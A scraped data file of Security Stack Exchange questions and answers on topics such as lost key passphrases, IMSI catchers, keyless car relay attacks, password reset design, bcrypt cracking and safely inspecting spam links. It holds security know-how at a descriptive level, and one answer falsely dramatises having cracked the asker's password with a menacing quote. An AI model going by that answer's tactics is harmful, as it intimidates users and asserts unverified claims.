source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
117,033 | We have a set of public and private keys and certificates on the server. The problem is that while public encryption works fine, the passphrase for the .key file got lost. So, when trying to execute the following command: openssl rsa -in the.key It will obviously ask for the passphrase. Is it possible to get the lost passphrase somehow? | The whole point of having a passphrase is to lock out anyone who does not know it. Allowing it to be recovered would defy the principle and allow hackers who get access to your certificate to recover your keys. So no, there is no such thing. What you should do is declare the keys as lost to the issuer so that they revoke your certificate. Then, you have to create a new one from scratch. | {
"source": [
"https://security.stackexchange.com/questions/117033",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/103991/"
]
} |
117,059 | C is a rock-solid and widespread programming language that is very popular especially in the FOSS community. Many security-related software (such as encryption libraries) are written in C and will probably be written in C also in the future. One of the main reasons for it is the great performance and portability of C programs.
But the point is that even very experienced software developers can't prevent bugs like buffer overflows. Every year quite a lot security bugs related to memory management are found in even very popular and reviewed software. So my question to you: Is it still a good idea to write security-related software in C nowadays? Or isn't it "security by design" to choose modern languages like Rust, Go or more high-level languages like Python? | The main and almost unique reason why most software in the Linux ecosystem is written in C is Tradition . Developers see software written in C, libraries with a C-based API, and thus they use C, because that's convenient. Compilers are already there, and work well because the whole OS is written in C. None of this says that C is good for developing robust software. In fact, C is quite terrible at it. With C, the developer must remain wary of many things at all times. C has many traps ready to be sprung on the smallest mistakes, including: Unchecked array accesses, thus allowing for overflows. Manual memory management, leading to use-after-free or double-free errors, and memory leaks. The dreaded "undefined behaviour" that makes seemingly reasonable expressions run amok (in particular, signed operations that exceed the representable range). Portability issues when going to architectures with different lengths for integer types and pointers. What C is real good at is the following: Interacting with an existing set of libraries that offer a C API. C is the lingua franca that allows interoperability between software components on many platforms. What C is passably good at is: Writing very low-level code (e.g. crypto code resistant to timing attacks through fixed memory access patterns) while trying to keep some level of portability. My conclusion is that C is not a good idea for writing security-related software in general , and has not been so for quite some time already (at least a decade). C is still justified in some specific contexts, in particular if you target embedded platforms (not embedded as in "smartphone", rather embedded as in "smart card"). Instead of looking for reasons to move away from C, it would be more justified to look for specific reasons to keep using C. | {
"source": [
"https://security.stackexchange.com/questions/117059",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91106/"
]
} |
117,068 | According to the ownCloud documentation , if you enable encryption, file sizes can be ~35% larger than their unencrypted forms. From my understanding of encryption, the file sizes should be more-or-less identical (perhaps some padded 0 bits at the end to make it a multiple of the key size). Is that incorrect? If not, why? | Most likely, the encrypted file is base64 encoded which would account for 33.3% file increase (you encode three bytes of data in four bytes of base64 data). Inserting a new line every 64 characters to make it easier to read (as is done by ASCII armor in openssl, GPG, PGP) will increase the size by 65/64. Combining these two effects results in the new file being (4/3)*(65/64) = 135.4% of the size of the original or an increase in file size of 35.4%. I've gone through the calculation in this answer here . You are correct though that encryption should not need to significantly change the file size. It possibly adds a couple blocks of data if there is a header, an initialization vector/nonce, some padding to make it a full block and/or MAC to check integrity, though these changes will be insignificant for large files (e.g., adding four blocks to an AES encoded file that is 1 MB would make the file 0.006% larger). However, to not increase the files size, you need to be fine with storing and passing around the encrypted data as an arbitrary binary. Arbitrary binaries are often blocked over email to prevent spreading computer viruses, and are often difficult to open outside of hexeditors. Base64 encoded files are easier to pass around and is a more portable format than binary files of an unknown file type. | {
"source": [
"https://security.stackexchange.com/questions/117068",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2944/"
]
} |
117,087 | Does SSL certification have anything to do with the website's legitimacy? Are those websites which has it are under some kinda monitoring? Generally speaking, can a company say they follow the law because their website has SSL certification? | No. You are confusing an SSL / TLS certificate with some kind of standards-compliance certification from either government or industry (ex.: ISO-9000). A TLS Certificate: Is used only for encrypting connections from one computer to another. Links your public key to your server's domain name so that a web browser knows that it is talking to the correct server. To get it, all you have to do is prove that you own the server and the domain name. The people who give out TLS certificates absolutely do not care what you do with the certificate after you have it (that's not their job). A standards-compliance certification: Is used for showing that your company is accountable and trustworthy. Shows that the people in your company follow a set of rules in their day-to-day business (either government rules, or industry rules like an ISO certification). To get it, auditors come to your workplace and observe that your people do things according to the rules. Standards bodies will continue to audit your company, and you can lose your certification if you stop following the rules or do something bad. | {
"source": [
"https://security.stackexchange.com/questions/117087",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104033/"
]
} |
117,131 | I think that it's fundamental for security testers to gather information about how a web application works and eventually what language it's written in. I know that URL extensions, HTTP headers, session cookies, HTML comments and style-sheets may reveal some information but it's still hard and not assured. So I was wondering: is there a way to determine what technology and framework are behind a website ? | There's no way to be 100% sure if you don't have access to the server, so it's about guessing. Here are some clues: File extensions: login.php is most likely a PHP script. HTTP headers: they may leak some information about the language which is running on the server, and some additional details like the version: X-Powered-By: PHP/7.0.0 means that the page was rendered by PHP. HTTP Parameter Pollution : if you managed to guess which server is running, you can refine the guess. Language limits: maximum post data, maximum number variable in GET and POST data, etc. It may be useful if the webmaster kept the default values. Specific input: for example, PHP had some easter eggs . Errors: triggering errors may also leak the language. Warning: Division by zero in /var/www/html/index.php on line 3 is PHP, for example. File uploads: libraries may add metadata if the file is being modified server-side. For example, most sites resize users' avatars, and checking for EXIF data will leak CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), default quality , which may help to guess which language is used. Default filenames: Check if / and /index.php are the same page. Exploits: reading a backup file, or executing arbitrary code on the server. Open source: the website may have been open-sourced and is available somewhere on Internet. About page: the webmaster may have thanked the language community in a "FAQ" or "About" page. Jobs page: the development team may be recruiting, and they may have detailed the technologies they're using. Social Engineering: ask the webmaster! Public profiles: if you know who is working on the website (check LinkedIn and /humans.txt ), you can check their public repos or their skills on online profiles (GitHub, LinkedIn, Twitter, ...). You may also want to know if the website is built with a framework or a CMS, since this will give information about the language used: URLs: directories and pages are specific to certain CMS. For example, if some resources are located in the /wp-content/ directory, it means that WordPress have been used. Session cookies: name and format. CSRF tokens: name and format. Rendered HTML: for example: meta tags order, comments. Note that all information coming from the server may be altered to trick you . You should always try to use multiple sources to validate your guess. | {
"source": [
"https://security.stackexchange.com/questions/117131",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70714/"
]
} |
117,311 | I develop my own viruses for 'scientific' purposes, namely to see if they pass the test of Virustotal.com. They all do, except for one or two scanners. Is this considered something you should report to Microsoft/McAfee/etc? If yes, how? | That's a pointless exercise. Most malware scanners match on fragments of binary code (aka virus signatures), and they check MD5 hashes of known infected code against their blacklists. Unless the virus you wrote has been deployed into the wild and is already on their blacklist, there isn't a chance they'll have your code's exact signatures on file. The scanners that do trigger a match are most likely those using heuristics, which scan for "suspicious" behavior. For example, very few programs legitimately need to request the OS grant them the privilege to "Act as a debugger", yet that's fairly common behavior in malware, so if they find it they'll flag it. Reporting your custom viruses to McAfee won't help anyone - not McAfee, not the public. If they don't identify your code as a virus, it's because their scanners don't have very effective heuristics (which they already know, and won't learn from your code among the hundreds of viruses they analyze per day.) And developing a match takes a researcher time and effort, which costs McAfee money. There is no value to McAfee to waste money on researching a virus that nobody can get, and adding it to their blacklists, because as a white hat you won't allow it to be released. | {
"source": [
"https://security.stackexchange.com/questions/117311",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104286/"
]
} |
117,460 | There's been a lot of reporting in the past few years about law enforcement agencies using IMSI catchers (also known as Stingrays after a popular brand of them) to intercept cellular communications. If I understand correctly, what IMSI catchers do is basically a man-in-the-middle (MITM) attack, by insinuating themselves between cell phones and cell towers. However, in the context of the Internet, we've known how to defend against MITM attacks for decades (namely, through public-key cryptography ). Why aren't IMSI catchers rendered ineffective by similar defenses employed in cellular networks? | tl;dr - the protocols were developed prior to MITM being perceived as a threat; the deployed infrastructure now serving billions of cell phones worldwide can't easily be changed to add cell tower validation; and governments have no interest in fixing this issue. Cell phone protocols differ from IP protocols in that they were never a peer-to-peer network of untrusted devices. The original cell phones were analog, with only a small channel of digital data to carry call information. These analog protocols were developed in the 1970s when the micro CPUs had almost no power or storage, and the only security thought was to ensure accurate billing. Also working in the cellular companies' favor, the only equipment authorized to transmit on those frequencies was under full control of the cellular manufacturers; companies like Motorola had a virtual lock on all the equipment on both ends of the call. The protocol they created was such that the cell phones implicitly trust the cell towers for all operational information: signal strength measurements (for optimizing battery life), network IDs (for billing and roaming charges), and encryption requirements (which need to be turned off on a per-jurisdiction basis.) The phone responds with its ID in order to register to receive incoming call information, and the phone company authenticates the ID to ensure proper billing. But in all this, the phone never authenticates the tower. Also, all this metadata is exchanged in cleartext. When digital cellular protocols like GSM arrived, nothing much had changed in the security model. In the 1990s, the main security threat was eavesdroppers, so laws were passed in the US prohibiting listening in on cell calls. Digital voice data was easy to encrypt to protect the privacy of the calls, (supposedly a government agency ensured that weak encryption algorithms were selected.) Otherwise, the existing cellular protocols continued to work without many security issues (security issues primarily being defined by the cellular companies as "people hacking our systems to make free calls".) Stingrays and other IMSI-catchers violate the cell tower agreements by producing an illegal signal, pretending to be a cell tower. They forge a signal strength response of "excellent", which causes the phone to not switch towers. They identify themselves as various common network IDs, so the phones do not switch away to avoid roaming charges. They control the encryption flag, which will cause a phone to downgrade security either to the least secure algorithm, or disable encryption completely. As far as a MITM goes, they may pass along the phone call data to a legitimate tower, or they may simply send back an error code the user sees as a call failure. Nowhere in the protocol designs was a thought given to malicious actors transmitting on their licensed frequencies. Illegal use of airwaves has long been a felony, and their original approach was legal: "if someone even tries to spoof a cell phone, we'll have them arrested and locked up for a decade." But it turns out that not everyone is afraid of committing a crime, least of all police departments armed with warrants and Stingrays. Private researchers have also exploited loopholes in the law, where they transmit cell tower signals legally on unlicensed frequencies (the ISM band). This same band happens to be allocated for cell use in foreign countries, so a quad-band phone in the US will happily receive the faked signals. | {
"source": [
"https://security.stackexchange.com/questions/117460",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32194/"
]
} |
117,475 | If I have a website or mobile app, that speaks to the server through a secured SSL/TLS connection (i.e. HTTPS), and also encrypt the messages sent and received in-between user and server on top of the already secure connection, will I be doing unnecessary moves? Or is double-encryption a common method? If so, why? | It's not uncommon, but it may not be required. A lot of developers seem to forget that HTTPS traffic is already encrypted - just look at the number of questions about implementing client side encryption on this website - or feel that it can't be trusted due to well-publicised issues such as the Lenovo SSL MitM mess . However, most people weren't affected by this, and there aren't any particularly viable attacks against TLSv1.2 around at the moment, so it doesn't really add much. On the other hand, there are legitimate reasons for encrypting data before transmission in some cases. For example, if you're developing a storage application, you might want to encrypt using an app on the client side with a key known only to the user - this would mean that the server would not be able to decrypt the data at all, but it could still store it. Sending over HTTPS would mean that an attacker also shouldn't be able to grab the client-encrypted data, but even if they did, it wouldn't matter. This pattern is often used by cloud based password managers. Essentially, it depends on what you're defending against - if you don't trust SSL/TLS, though, you probably can't trust the encryption code you're sending (in the web application case) either! | {
"source": [
"https://security.stackexchange.com/questions/117475",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/45233/"
]
} |
117,536 | Let’s say I have never connected to the site example.com . If this site is https and I write https://example.com/supersecretpage will the URL be sent in clear text since it's the first time I connect to the site and therefore the crypto keys were not yet exchanged? If not when does this take place? Could anyone explain the steps when I type that URL? | Short answer: No, the URL is encrypted, but the (sub)domain is sent in plain-text. In your case a (passive) attacker knows that you are connecting to example.com , but it does not know which specific page you are accessing. In short there are three times where an attacker can get information about the site you are accessing (ordered chronological): (Sub)domain in the DNS query (Sub)domain in the Client Hello (SNI) (Sub)domain in server certificate However the... URL is sent encrypted via TLS For more details read the explanation below. Explanation Note: When I am writing "(sub)domain" I mean both the domain ( example.com ) and the subdomain ( mydomain.example.com ). When I only write "domain" I really only mean the domain ( example.com ) without the subdomain. Basically what happens is: You type in https://example.com/supersecretpage . The browser submits the (sub)domain in a special TLS extension (called SNI ) At some point the browser gets the SSL certificate from the server. Depending on the certificate* this also includes the subdomain you're connecting to, but it may also include more than one subdomain and even more than one domain. So in fact the cert of example.com may also include www.example.com , devserver.example.com and how-to-develop-tls.example . These entries are called Subject Alternative Names and the cert is valid for all of them. After the client verified the certificate and the client & server choose a cipher the traffic is encrypted . After all this happened a "usual" HTTP request is send (over the secured TLS channel). This means this is the first time in the whole request where the full URL appears. The request e.g. looks like this: GET /supersecretpage HTTP/1.1 Host: example.com [...] * If the certificate is a wildcard certificate it does not include the subdomains, but just *.example.com . Another thing is worth mentioning: Before the connection can be established at all the client needs to resolve the DNS name. To do this it sends unencrypted DNS queries to a DNS server and these ones also contain the (sub)domain , which can therefore be used by an attacker to see the visited domains. However this does not always have to happen in this way, because you assume the user manually types in https://example.com/supersecretpage into the URL bar. But this is very rare as most users e.g. would rather type in example.com/supersecretpage . Another issue would be visitors clicking on an insecure link , which uses HTTP - in contrast to a secure HTTPS-link ). Such links could e.g. be old links created when the site did not support HTTPS or did not redirect to HTTPS by default.
You ask why this matters? In the such a (usual) case there is no https:// in the URL. When no protocol is entered into the URL bar all browsers internally "convert" this URL to http://example.com/supersecretpage (note the http:// there) as they cannot expect the server to support HTTPS.
This means the browser first tries to connect to the website using insecure HTTP and only after the website sends a (301) redirect to the HTTPS URL it uses the secure mode. In this case the attacker can see the full URL in the unencrypted HTTP request. You can easily test this by yourself by looking into the "network panel" of your browser. There you should see this "HTTPS upgrade": However note that there are techniques to prevent this insecure first HTTP request. Most notably HSTS and - to protect even the first connection you make to the site - HSTS preloading , but also HTTPS Everywhere helps against such attacks. FYI: According to Netcraft 95% of all HTTPS servers vulnerable were vulnerable to such (SSL Stripping) attacks as of March 2016. | {
"source": [
"https://security.stackexchange.com/questions/117536",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104545/"
]
} |
117,605 | I have a student loan account with a company, not the biggest company but big enough to where they should have their act together. Today I couldn't remember my password to log into my account dashboard. I clicked "forgot password" and they prompted me with 5 questions. First Name, Last Name, last 4-digit SSN, birthday, and zip code. All information that is easily acquirable if trying hard enough, not to mention all information that is included in their periodic emails about payments. Upon typing in the information the site responds saying I have been authenticated and gives me my password in plaintext. So now not only is it incredibly easy to retrieve lost password details, they dont even send it to your email they just display it on screen, on top of that they store the password in plaintext in the database. This is an account that has details of my multi-thousand dollar loan as well as my bank details for auto-payments. Fortunately the one detail not given is my username, which is my full SSN, so that is the last thread of security; however, if they store passwords unhashed I'm sure my SSN is not either, making this even worse. So my question is, given that this is a loan that I can't just up and leave is there/what are any precautions or steps that I can take to make this potentially more secure? Would it be worth emailing them and badgering them to upgrade their security or should I just pay as quick as possible and get out? If I do warn them, what types of threat should I say they are vulnerable to in hopes to scare them into a patch? | If you are concerned about the privacy of your password and thus your account (which should be the case), you should try to educate the customer service. The developer FAQ from the public shaming project for this kind of recklessness lists a few good points and is worth a read. Also, you should point out that you feel insecure and lose trust in the company and will make them liable for any problems that stem from this no-go. You should also document that behaviour and try to get a written quote on their point of view if they do not see a reason to fix this. Thus, if any problems arise, it will make the whole thing easier for you from a legal point of view. Besides that, by submitting the site to plaintext offenders , you will provide a third-party point of view, which might help your case. Also, I assume you use a secure unique password for that site and hopefully have always done so. If not, treat this as a regular leak , changing all your passwords (and on that occasion, make sure to use unique passwords for each service) | {
"source": [
"https://security.stackexchange.com/questions/117605",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83603/"
]
} |
117,696 | The German automobile club ADAC did a test with several cars which open doors and start the engine with a "keyless entry" system. You don't have to push a button on your car key. If you get near your car, key and car will recognise each other. If you pull the door handle the car will open. Inside the car your push the ignition button and the engine starts. The security relies on the distance between key and car. Car thieves have built a repeater to tunnel the radio signals over long distances. One thief stands near the key and the other near the car. Then the car will open. The distance between car and key can easily be several hundreds of meters. Lots of cars are stolen this way. How could car manufacturers solve this problem or is this an
unpatchable design flaw? Are there any mitigations a car owner could
take in place? How should wireless physical access control look like for cars? | From a layman point, Yes its a design flaw and yes the signals are boosted to unlock the cars from far far away. This is knows as Relay Station Attack(RSA). Some of the ways to mitigate such attacks are: measuring Group delay time to detect illegal high values measuring Third-order intercept point to detect illegal
Intermodulation products measuring Field strength of the Electric field measuring response time of 125 kHz LC circuit using a more complex Modulation (i.e. Quadrature amplitude
modulation) which can't be demodulated and modulated by a simple
relay station putting a physical on/off switch on the key I don't think these mitigations can be used by the car owner themselves as there is quite technical detail behind it. Taken from wikipedia. Smart keys and Security requirements | {
"source": [
"https://security.stackexchange.com/questions/117696",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104357/"
]
} |
117,706 | Just for a brief overview. I have a system that can generate invoices and has a login system for a user to generate his/her invoices. Lets say the platform resides at /platform and the invoices in /platform/invoices and the platform is at the domain www.exmaple.com . People can log in and generate their invoices which effectively generates the invoice in the invoices folder and then via the url www.example.com/invoices/invoicename.pdf downloads the file. The invoices folder is publically accessible to allow the system to grab the file. However if for example clientA navigated to www.example.com/invoices/invoicename-ownedbyclientB.pdf he would be able to download an invoice that did not belong to him. I can certainly do things to mitigate this such as deleting the invoice after generation and downloads to keep the folder clean, disallow index on directories to stop easy navigation, change the system so that files are sent via email as opposed to downloaded to a system directory. On the system side I can easily limit what people have access to as they are authenticated but what would be the best way to deal with the above situation. I have considered using htaccess or similar in this directory to ensure that calls originate from the server itself (I haven't check if this is possible, just an assumption at the moment). | From a layman point, Yes its a design flaw and yes the signals are boosted to unlock the cars from far far away. This is knows as Relay Station Attack(RSA). Some of the ways to mitigate such attacks are: measuring Group delay time to detect illegal high values measuring Third-order intercept point to detect illegal
Intermodulation products measuring Field strength of the Electric field measuring response time of 125 kHz LC circuit using a more complex Modulation (i.e. Quadrature amplitude
modulation) which can't be demodulated and modulated by a simple
relay station putting a physical on/off switch on the key I don't think these mitigations can be used by the car owner themselves as there is quite technical detail behind it. Taken from wikipedia. Smart keys and Security requirements | {
"source": [
"https://security.stackexchange.com/questions/117706",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104715/"
]
} |
117,730 | What's wrong with generating a password for you without storing it? Like why is MasterCard on the plain text offenders list ? | Because most users do not change their password after such a reset and mindlessly instruct their browser to save the new password and/or the site does not force users to change it after their first login. Thus they effectivly send the new password in plain text, thus they are offenders. A better way may be a One-Time-Token for a password reset, preferably sent via snail mail or SMS. | {
"source": [
"https://security.stackexchange.com/questions/117730",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
117,740 | Over the last few weeks, I've gotten several spam emails from different friends that only contained links to different websites. I would like to click on those links and see what's on the website. My reasons are curiosity, the ability to understand how dangerous the website might be, and to differentiate between a product-spam email ("Buy product XYZ!") and a website that tries to do something dangerous to a computer. I do not intend to use a production system, a system with my personal data on it, or something I am not willing to lose in the process; I am really just curious. So what measures would I need to take in order to safely 1 click on those links? My ideas so far are: Virtual Machine Disable Flash, Java, JavaScript 2 , ... in the browser Having an up-to-date OS / Antivirus Use NoScript Use external websites that check the linked website like: http://www.antihacksecurity.com/scan-a-website-for-virus-malware (link seems down?) beforehand Footnotes: I am almost certain that there is no way to really safely click those links, so maybe this should be called "minimize the risk when you..." I am aware that disabling stuff might not give me a complete and real picture of the website, since I might not experience the intended effect and think "It's safe." | VPN Virtual Machine View-Source for those who know Javascript [Tinfoil Hat (Mythic Warforged)] here. If you are handy with Javascript and the like, I've always appreciated view-source:http://www.webaddress.com/ from the URL bar. For added tinfoil, do it behind a VPN, and a Virtual Machine. The VPN is necessary just in case the attacker expects you to visit personally from your actual IP address. Your access attempt will show up in the visitor logs, but if they just get a random VPN, then Ho Ho Howned. And the Virtual Machine is, of course, there to prevent strange attacks against the view-source page, which may or may not exist. Will not help against VM-escaping thingmabobs. Alternatively, you can programmatically open a socket connection (be wary of vulnerabilities in your chosen language) while behind a VPN, and use GET /page.html HTTP/1.0 to grab the HTML page, and then do the same for accompanying Javascript. Look for funny things like zzz.saveToFile() , which usually indicate a drive-by download attempt. Same with intentionally obfuscated Javascript; it should not be trusted . Keep in mind that Minification and obfuscation are two different things . Developer Console Watching (F12) If you are handy with web development, and you want to see exactly what kind of odd funkiness is going on without having to completely follow the script line-by-line, then you can monitor changes as they happen with the developer console. This allows you to load the results of off-site/off-page Javascript that is generated dynamically. Temporary Folder Watching This is assuming you're behind a virtual machine. Obviously, you would not want to try this on your main machine. Don't forget your temporary folder, which is usually %TEMP% . With drive-by downloads, they usually start saving executables to %TEMP% . You can see if such a thing occurs when you visit a page. They can be saved as .tmp files, which are later renamed to .exe . This is usually discovered by a function that looks like x.saveToFile() Reset your Virtual Machine when you're done Don't forget to reset your VM's state/snapshoot afterwards. You don't want to be infected long-term. | {
"source": [
"https://security.stackexchange.com/questions/117740",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99028/"
]
} |
117,854 | For my project I need a " forgot password " functionality. I am not quite sure how to implement this kind of functionality yet so I was hoping to find some "best practice" on the internet but couldn't find anything useful that treats every important aspect of this quite common feature. My own thoughts about this are rather straight forward: If a user wanted to change his password I could create a unique token uniqueTokenForTheUser attached to a "change password request" which would be essentially the identifier for my backend to tell if it was the right user who sent the request. So for example I'd generate/send an email to [email protected] with a link http://www.example.com/changePassword?token=uniqueTokenForTheUser uniqueTokenForTheUser would be stored in a table that gets checked by a thread in a certain interval and removes the record once the token is expired in case the user did not actually change his password. Although this sounds rather straightforward to me, I wanted to double-check if there were any "best practices" out there e.g. when it comes to generation and deletion of that particular token. Any suggestions or references to articles/tutorials are welcome! Additional links suggested by comments: The definitive guide to form-based website authentication (Thanks to Krumia) | Use HTTPS only for this, and then we'll get onto details of implementation. First of all you're going to want to protect against user enumeration . That is, don't reveal in the page whether the user exists or not. This should only be disclosed in the email itself. Secondly you will want to avoid referrer leakage . Ensure no external links or external resources are present on your target link. One way to mitigate this is to redirect after the initial link is followed so that the token is no longer in the query string. Be aware that if something goes wrong (e.g. your database is briefly down), and a standard error template is shown, then this may cause the token to be leaked should it contain any external references. Generate a token with 128bits of entropy with a CSPRNG. Store this server-side using SHA-2 to prevent any data leakage vulnerabilities on your reset table from allowing an attacker to reset passwords. Note that salt is not needed. Expire these tokens after a short time (e.g. a few hours). As well as providing the non-hashed token to the user in the email link, give the option for the user to navigate to the page manually and then paste in the token value. This can prevent query string values from being logged in browser history, and within any proxy and server logs by default. Optionally you may want to make sure that the session identifier for the session that initiated the password reset is the one that followed the link . This can help protect an account where the attacker has access to the user's email (e.g. setting up a quick forward all rule with limited access to the email account). However, all this really does is prevent an attacker from opportunistically following a user requested reset - the attacker could still request their own reset token for the victim should they want to target your particular site. Once the password has been reset to one of the user's choice, you will need to expire the token and send the user an email to let them know this has happened just in case an attacker has somehow managed to reset their password (without necessarily having control of their mail account) - defence in depth. You should also rotate the current session identifier and expire any others for this user account .
This negates the need of the user having to log in again, whilst also clearing any sessions ridden by an attacker, although some users like to have the site log them out so they get a comfort blanket of confirmation that their password has actually been reset. Redirecting to the login page also gives some password managers the chance to save the login URL and the new password, although many already detect the new password from the reset page. You may also wish to consider other out of band options for the reset mechanism and the change notifications. For example, by SMS or mobile phone alerts. | {
"source": [
"https://security.stackexchange.com/questions/117854",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70899/"
]
} |
117,879 | I've read this question and to quote from the accepted answer Besides that, by submitting the site to plaintext offenders, you will provide a third-party point of view, which might help your case. But, isn't submitting a website to plaintext offenders putting yourself at more risk? Someone with malicious intent could see the website you submitted to plaintext offenders and then go try to exploit the vulnerability, putting yourself (and anyone else using that site) at more of a risk. Or am I just missing something? | To quote their FAQ : Aren’t you worried hackers will use your site to find targets? Yes, but less worried than having this information remain secret and relying on Security Through Obscurity. To be more verbose: There are two possible outcomes from submitting a site there: They fix it - This is more likely to happen when they get publicly shamed. The attack probability increases, too. Also, hiding security problems away (leaving it secure only as long as it is kept secret) rather than fixing them is generally considered a security antipattern, as the NIST "Guide to General Server Security" states: "System security should not depend on the secrecy of the implementation or its components." They do not fix it - Then it is at least documented publicly and externally. To be more specific, thanks to Chris Cirefice who pointed out it the comments more explicitly what I had in mind: "documented publicly and externally" - with timestamps . So if a student loan company is hacked and the students' bank details are released due to lack of compliance with (U.S.) government policies, e.g. the Gramm-Leach-Bliley Act 1 2, the students could sue the company, and the timestamps of public release of failure to comply would be great evidence in court for recompense. | {
"source": [
"https://security.stackexchange.com/questions/117879",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/72375/"
]
} |
118,052 | According to Edward Snowden in this tweet ... Phones used in real-world ops are disposed on a per-action, or per-call basis. Lifetimes of minutes, hours. Not days. Let's imagine for a moment that I'm Jason Bourne. I've stopped by the kiosk in Waterloo Station and picked up a PAYG mobile phone. Presumably I've used fake ID. At the same time, my counterparty Jack Bauer is picking up a prepaid phone from a similar kiosk at Los Angeles International Airport. How do I actually place a call to him, given that both of us have new phone numbers? | Burner phone numbers as an OTP 'equivalent' You can think of the "identities" of those phones (phone number, SIM, phone itself/IMEI) as an equivalent of one-time pad encryption - you exchange the phone numbers (multiple) over a secure channel - e.g., when meeting in person; and then they're secure and provide no useful information (for network/metadata analysis) as long as you discard them after a single use. In your proposed scenario, Jack would have picked up a bunch of prepaid phone cards and given you the list of those numbers. Afterwards, if you'd need to contact him, you would call the first number on the list, have your conversation, and after that you could both discard the phones. If you'd expect a future call, then you'd turn on the phones corresponding to the second item on your lists. | {
"source": [
"https://security.stackexchange.com/questions/118052",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27877/"
]
} |
118,058 | I just checked https://haveibeenpwned.com/ and I have noticed that I was pwned, therefore I checked the file that hosts the details of my "credentials", however, I see my email in plain text but the password as a bcrypt hash. Since hash functions are one way and cannot be reversed, should I still be worried and change all my passwords or am I being too paranoid? EDIT: When I meant "all my passwords" I meant ones that are not closely relevant/similar to the exposed password. Obviously using the same password for almost all websites is quite stupid IMO. EDIT 2: I would like to ask for all of you to not share any information about how it is done. Thanks for your understanding. | A brief overview of weak hash algorithms vs. bcrypt With weak password hashing algorithms, what hackers will do is try millions, or billions of different combinations - as fast as their hardware allows for - and many easy passwords will fall quickly to rainbow tables / password crackers / dictionary-based attacks. Attackers will try to compare a massive quantity of strings to your hash, and the one that validates is very likely your password. Even if it isn't, you can still log in with it because you've found a collision. However, bcrypt is different. It's computationally slow, so this cracking will be slowed down immensely . Bcrypt can help slow cracking down to the point where you can only do a few tests per second, if that. This is due to the computational cost factor. You should read this answer by Thomas Pornin for a better explanation: If the iteration count is such that one bcrypt invocation is as expensive as 10 millions of computations of MD5, then brute-forcing the password will be 10 million times more expensive with bcrypt than with MD5. That's the point of having configurable slowness: you can make the function as slow as you wish. Or, more accurately, as slow as you can tolerate: indeed, a slow function is slow for everybody, attacker and defender alike. So it really depends on the added computational cost. Some custom hardware solutions are able to crack bcrypt hashes at upwards of 52k hashes per second. With a standard attack, and a poor password, you don't have much hope of holding out for long. Again, this depends on the computational cost: even this custom hardware solution can be forced down to 2-5 hashes per second, or even slower. Do not re-use passwords if you care about the accounts. I already found your credentials, and "cracked" your bcrypt hash But I won't hack you, don't worry. This is just to demonstrate why you should update your credentials, and stop-reusing your password. You wanted an answer, so what better than a live demonstration? You're from the U.K., correct? Your bcrypt hash is also $2a$10$omP392PbcC8wXs/lSsKZ5Ojv9.wFQ7opUn7u3YUBNu0kkbff0rB.m , correct? I already "cracked" your password, and I know your accounts. I see you, a thief on the roof. My new satellite link has both infrared and the x-ray spectrum. I see your heart beating; I see you are afraid. This should go without saying: you should definitely change your passwords. Start changing your credentials now... before it's too late. You should be worried, and you should change your passwords. Now. Yes, bcrypt can be extremely slow, but... I actually found a way to completely side-step the brute-forcing process with simple data aggregation and correlation. I wrote a little program that ties a few pieces of information together, and compares them. Not a password cracker or anything like that, but at the end of the day, it got the same job done. For your privacy - and as per your request - I will not share how I did this on here, but you should know that I am not the only one who can do it. If I can do it, so can others. However... you need to stop reusing passwords! You really, really do not want to do this. If one site is compromised, having different passwords on other accounts protects the others from breaches as well. Update all of your accounts, even ones you haven't used in a while, and stop reusing passwords unless you don't care about them. You may want to consider something like KeePass . | {
"source": [
"https://security.stackexchange.com/questions/118058",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105070/"
]
} |
118,077 | When I click to download a file through Firefox, a dialog window appears asking me whether I want to save the file somewhere or open it immediately once downloaded. The OK button in the dialog window starts disabled, and doesn't enable until the dialog has had focus for around a second. The dialog isn't modal, and if I focus on another window the OK button will disable and again won't re-enable until the window has held focus for a second. My partner lamented at this design, and asked me why she couldn't just click OK to download immediately - I responded that I've always thought it was a security feature. Now that I think about it however, I'm not certain exactly what behavior it could be preventing. I would have thought that it might prevent some malicious website from downloading a file secretly by forcing the download window to stay open for at least long enough to see whats going on - however it should be possible for a site to download stuff secretly in the background anyway. Regardless I presume most users would have clicked the 'do this automatically from now on' box at some point, and thus be unprotected anyway... So, is this a security feature? If so what does it protect against? | Yes, it is a security feature, and the purpose of the delay is to prevent attacks based around tricking the user into entering input to skip past the dialog by popping it up unexpectedly when the user is in the middle of inputting multiple key presses or mouse clicks in quick succession. The two examples that are given in this blog post explaining the feature are: A CAPTCHA that asks the user to type the word only . When they press n , a save dialog is popped up, and then the user will immediately press l and then y , which is the keyboard shortcut for OK on some browsers, unintentionally confirming the download A webpage that convinces the user to double-click somewhere on screen, positioned so that when the dialog opens after the first click, their mouse pointer is right over the "OK" button, meaning that they immediately confirm it. By disabling the button for several seconds, the input has no effect. Mozilla bug report about the issue | {
"source": [
"https://security.stackexchange.com/questions/118077",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47290/"
]
} |
